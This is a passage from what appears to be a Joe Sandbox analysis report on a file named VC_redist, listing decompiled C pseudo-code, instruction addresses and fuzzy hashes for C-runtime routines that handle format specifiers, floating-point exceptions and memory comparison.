                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 0bdc4b63181193a7d0c8f047a4fe6d34f22109008b79e33a9071ad3f9f7beac0
                                                                          • Instruction ID: 82e847b47ee9009ac67c401b7f57f497bd4d4ffba8ec399660a046c712d2df20
                                                                          • Opcode Fuzzy Hash: 0bdc4b63181193a7d0c8f047a4fe6d34f22109008b79e33a9071ad3f9f7beac0
                                                                          • Instruction Fuzzy Hash: D801DB71A0060867DB10EF659D499ABB7ACEBC5316F400155E908D3150D7345E8D8794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00042B21 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E00042B21(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E0004370F(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0004206E(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00043A0A(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0004206E(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E000438D8(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0004206E(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0004351A(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E000436F7(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00043126(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00043664(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E000436D8(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00043060(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E000433F2(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                                                                          0x00042b26
                                                                          0x00042b29
                                                                          0x00042b2d
                                                                          0x00042b30
                                                                          0x00042b34
                                                                          0x00042b37
                                                                          0x00042ba5
                                                                          0x00042ba8
                                                                          0x00042bf7
                                                                          0x00042bf7
                                                                          0x00042bfa
                                                                          0x00042b67
                                                                          0x00042b69
                                                                          0x00042b6e
                                                                          0x00042b70
                                                                          0x00042c15
                                                                          0x00042c19
                                                                          0x00042c22
                                                                          0x00042c27
                                                                          0x00042c28
                                                                          0x00042c2c
                                                                          0x00042c2e
                                                                          0x00042c33
                                                                          0x00042c36
                                                                          0x00042c38
                                                                          0x00042c61
                                                                          0x00042c61
                                                                          0x00042c64
                                                                          0x00042c67
                                                                          0x00042c6e
                                                                          0x00042c70
                                                                          0x00042c73
                                                                          0x00042c75
                                                                          0x00042c79
                                                                          0x00042c79
                                                                          0x00042c7c
                                                                          0x00042c87
                                                                          0x00042c87
                                                                          0x00042c89
                                                                          0x00042c89
                                                                          0x00042c8b
                                                                          0x00042c91
                                                                          0x00042c91
                                                                          0x00042c96
                                                                          0x00042c99
                                                                          0x00042ca4
                                                                          0x00042ca4
                                                                          0x00042ca6
                                                                          0x00042ca6
                                                                          0x00042cb1
                                                                          0x00042cb5
                                                                          0x00042cb5
                                                                          0x00042cb8
                                                                          0x00042cbe
                                                                          0x00042cc0
                                                                          0x00042cc3
                                                                          0x00042cd3
                                                                          0x00042cd8
                                                                          0x00042cd8
                                                                          0x00042ced
                                                                          0x00042cf2
                                                                          0x00042cf5
                                                                          0x00042cfa
                                                                          0x00042cfd
                                                                          0x00042cff
                                                                          0x00042d01
                                                                          0x00042d04
                                                                          0x00042d07
                                                                          0x00042d14
                                                                          0x00042d19
                                                                          0x00042d19
                                                                          0x00042d07
                                                                          0x00042d20
                                                                          0x00042d25
                                                                          0x00042d28
                                                                          0x00042d2d
                                                                          0x00042d30
                                                                          0x00042d32
                                                                          0x00042d3f
                                                                          0x00042d44
                                                                          0x00042d32
                                                                          0x00042d47
                                                                          0x00042d4a
                                                                          0x00042d4f
                                                                          0x00042d4f
                                                                          0x00042c9b
                                                                          0x00042c9e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042ca0
                                                                          0x00000000
                                                                          0x00042ca0
                                                                          0x00042c8d
                                                                          0x00042c8f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042c8f
                                                                          0x00042c7e
                                                                          0x00042c81
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042c83
                                                                          0x00000000
                                                                          0x00042c83
                                                                          0x00042c77
                                                                          0x00042c77
                                                                          0x00042c77
                                                                          0x00000000
                                                                          0x00042c77
                                                                          0x00042c69
                                                                          0x00042c6c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042c6c
                                                                          0x00042c3c
                                                                          0x00042c3f
                                                                          0x00042c41
                                                                          0x00042c49
                                                                          0x00042c4b
                                                                          0x00042c55
                                                                          0x00042c57
                                                                          0x00042c59
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042c5b
                                                                          0x00042c5f
                                                                          0x00042c5f
                                                                          0x00000000
                                                                          0x00042c5f
                                                                          0x00042c4d
                                                                          0x00000000
                                                                          0x00042c4d
                                                                          0x00042c43
                                                                          0x00000000
                                                                          0x00042c43
                                                                          0x00042c1b
                                                                          0x00000000
                                                                          0x00042c1b
                                                                          0x00042b76
                                                                          0x00042b76
                                                                          0x00000000
                                                                          0x00042b76
                                                                          0x00042c01
                                                                          0x00042c01
                                                                          0x00042c04
                                                                          0x00042bd6
                                                                          0x00042bd6
                                                                          0x00042bd7
                                                                          0x00042bd9
                                                                          0x00042bdb
                                                                          0x00000000
                                                                          0x00042bdb
                                                                          0x00042c06
                                                                          0x00042c09
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042c0f
                                                                          0x00042b7e
                                                                          0x00042b7e
                                                                          0x00000000
                                                                          0x00042b7e
                                                                          0x00042baa
                                                                          0x00042bed
                                                                          0x00000000
                                                                          0x00042bed
                                                                          0x00042bac
                                                                          0x00042baf
                                                                          0x00042be2
                                                                          0x00042be4
                                                                          0x00000000
                                                                          0x00042be4
                                                                          0x00042bb1
                                                                          0x00042bb4
                                                                          0x00042bd2
                                                                          0x00042bd2
                                                                          0x00042bd2
                                                                          0x00042bd2
                                                                          0x00000000
                                                                          0x00042bd2
                                                                          0x00042bb6
                                                                          0x00042bb9
                                                                          0x00042bcb
                                                                          0x00000000
                                                                          0x00042bcb
                                                                          0x00042bbb
                                                                          0x00042bbe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042bc2
                                                                          0x00000000
                                                                          0x00042bc2
                                                                          0x00042b39
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b3f
                                                                          0x00042b42
                                                                          0x00042b82
                                                                          0x00042b82
                                                                          0x00042b85
                                                                          0x00042b9e
                                                                          0x00000000
                                                                          0x00042b9e
                                                                          0x00042b87
                                                                          0x00042b87
                                                                          0x00042b8a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b8d
                                                                          0x00042b90
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b92
                                                                          0x00042b95
                                                                          0x00000000
                                                                          0x00042b95
                                                                          0x00042b44
                                                                          0x00042b7d
                                                                          0x00000000
                                                                          0x00042b7d
                                                                          0x00042b49
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b52
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b57
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b5c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00042b65
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$comres.dll
                                                                          • API String ID: 0-3030269839
                                                                          • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                          • Instruction ID: 10e2b5488e5c6d298700580e1e0bc9d85204fb2f79d8ff5d27c3a23c5d7bdf7f
                                                                          • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                          • Instruction Fuzzy Hash: 105164E070464557DBB89E284896BFE23C9EB52340FD8053AF882DB283D711EE41C39E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004ED4C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0004ED4C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0004C663(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0004C5C9(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                                                          0x0004ed5a
                                                                          0x0004ed61
                                                                          0x0004ed66
                                                                          0x0004ed6c
                                                                          0x0004ed6f
                                                                          0x0004ed75
                                                                          0x0004ed7a
                                                                          0x0004ed7f
                                                                          0x0004ed7f
                                                                          0x0004ed85
                                                                          0x0004ed8a
                                                                          0x0004ed8f
                                                                          0x0004ed8f
                                                                          0x0004ed96
                                                                          0x0004ed9b
                                                                          0x0004eda0
                                                                          0x0004eda0
                                                                          0x0004eda7
                                                                          0x0004edac
                                                                          0x0004edb1
                                                                          0x0004edb1
                                                                          0x0004edb8
                                                                          0x0004edbd
                                                                          0x0004edc2
                                                                          0x0004edc2
                                                                          0x0004edca
                                                                          0x0004edda
                                                                          0x0004edec
                                                                          0x0004edfe
                                                                          0x0004ee11
                                                                          0x0004ee23
                                                                          0x0004ee2b
                                                                          0x0004ee30
                                                                          0x0004ee35
                                                                          0x0004ee35
                                                                          0x0004ee3c
                                                                          0x0004ee41
                                                                          0x0004ee41
                                                                          0x0004ee48
                                                                          0x0004ee4d
                                                                          0x0004ee4d
                                                                          0x0004ee54
                                                                          0x0004ee59
                                                                          0x0004ee59
                                                                          0x0004ee60
                                                                          0x0004ee65
                                                                          0x0004ee65
                                                                          0x0004ee6f
                                                                          0x0004ee71
                                                                          0x0004eeab
                                                                          0x0004ee73
                                                                          0x0004ee78
                                                                          0x0004ee9c
                                                                          0x0004eea4
                                                                          0x0004ee98
                                                                          0x0004ee98
                                                                          0x0004eeae
                                                                          0x0004eeb5
                                                                          0x0004eeb7
                                                                          0x0004eed9
                                                                          0x0004eee1
                                                                          0x0004eee4
                                                                          0x0004eee4
                                                                          0x0004eee6
                                                                          0x0004eee6
                                                                          0x0004eef1
                                                                          0x0004eef7
                                                                          0x0004eefc
                                                                          0x0004ef03
                                                                          0x0004ef3d
                                                                          0x0004ef48
                                                                          0x0004ef4e
                                                                          0x0004ef51
                                                                          0x0004ef54
                                                                          0x0004ef60
                                                                          0x0004ef68
                                                                          0x0004ef05
                                                                          0x0004ef08
                                                                          0x0004ef14
                                                                          0x0004ef1a
                                                                          0x0004ef20
                                                                          0x0004ef23
                                                                          0x0004ef2c
                                                                          0x0004ef2c
                                                                          0x0004ef6b
                                                                          0x0004ef79
                                                                          0x0004ef7f
                                                                          0x0004ef86
                                                                          0x0004ef88
                                                                          0x0004ef88
                                                                          0x0004ef8f
                                                                          0x0004ef91
                                                                          0x0004ef91
                                                                          0x0004ef98
                                                                          0x0004ef9a
                                                                          0x0004ef9a
                                                                          0x0004efa1
                                                                          0x0004efa3
                                                                          0x0004efa3
                                                                          0x0004efaa
                                                                          0x0004efac
                                                                          0x0004efac
                                                                          0x0004efb9
                                                                          0x0004efbc
                                                                          0x0004eff3
                                                                          0x0004efbe
                                                                          0x0004efbe
                                                                          0x0004efc1
                                                                          0x0004efec
                                                                          0x0004efe1
                                                                          0x0004efe1
                                                                          0x0004eff5
                                                                          0x0004effd
                                                                          0x0004f000
                                                                          0x0004f01f
                                                                          0x0004f024
                                                                          0x0004f024
                                                                          0x0004f026
                                                                          0x0004f02b
                                                                          0x0004f037
                                                                          0x0004f02d
                                                                          0x0004f030
                                                                          0x0004f030
                                                                          0x0004f03c
                                                                          0x0004f03c
                                                                          0x0004f002
                                                                          0x0004f005
                                                                          0x0004f014
                                                                          0x00000000
                                                                          0x0004f014
                                                                          0x0004f007
                                                                          0x0004f00a
                                                                          0x0004f00c
                                                                          0x0004f00c
                                                                          0x00000000
                                                                          0x0004f00a
                                                                          0x0004efc3
                                                                          0x0004efc6
                                                                          0x0004efdc
                                                                          0x00000000
                                                                          0x0004efdc
                                                                          0x0004efcb
                                                                          0x0004efcd
                                                                          0x0004efcd
                                                                          0x0004efcb
                                                                          0x00000000
                                                                          0x0004efbc
                                                                          0x0004eebe
                                                                          0x0004eecc
                                                                          0x0004eed4
                                                                          0x00000000
                                                                          0x0004eed4
                                                                          0x0004eec2
                                                                          0x0004eec7
                                                                          0x0004eec7
                                                                          0x00000000
                                                                          0x0004eec2
                                                                          0x0004ee7f
                                                                          0x0004ee8d
                                                                          0x0004ee95
                                                                          0x00000000
                                                                          0x0004ee95
                                                                          0x0004ee83
                                                                          0x0004ee88
                                                                          0x0004ee88
                                                                          0x0004ee83

                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0004ED47,?,?,00000008,?,?,0004E9E7,00000000), ref: 0004EF79
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: 2ab27ca061b03501513bc739900c81805ee3f019f0c1a3991f23149eef8a4ca6
                                                                          • Instruction ID: 0add5aa45bad7722f6582809999c9cfd765df9ed626ab83f1397c73ba46fd96b
                                                                          • Opcode Fuzzy Hash: 2ab27ca061b03501513bc739900c81805ee3f019f0c1a3991f23149eef8a4ca6
                                                                          • Instruction Fuzzy Hash: BAB18EB1510649DFD764CF28C48AB647BE0FF45364F2586A8E899CF2A2C335E981CB44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00040662 Relevance: .3, Instructions: 345COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00040662(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
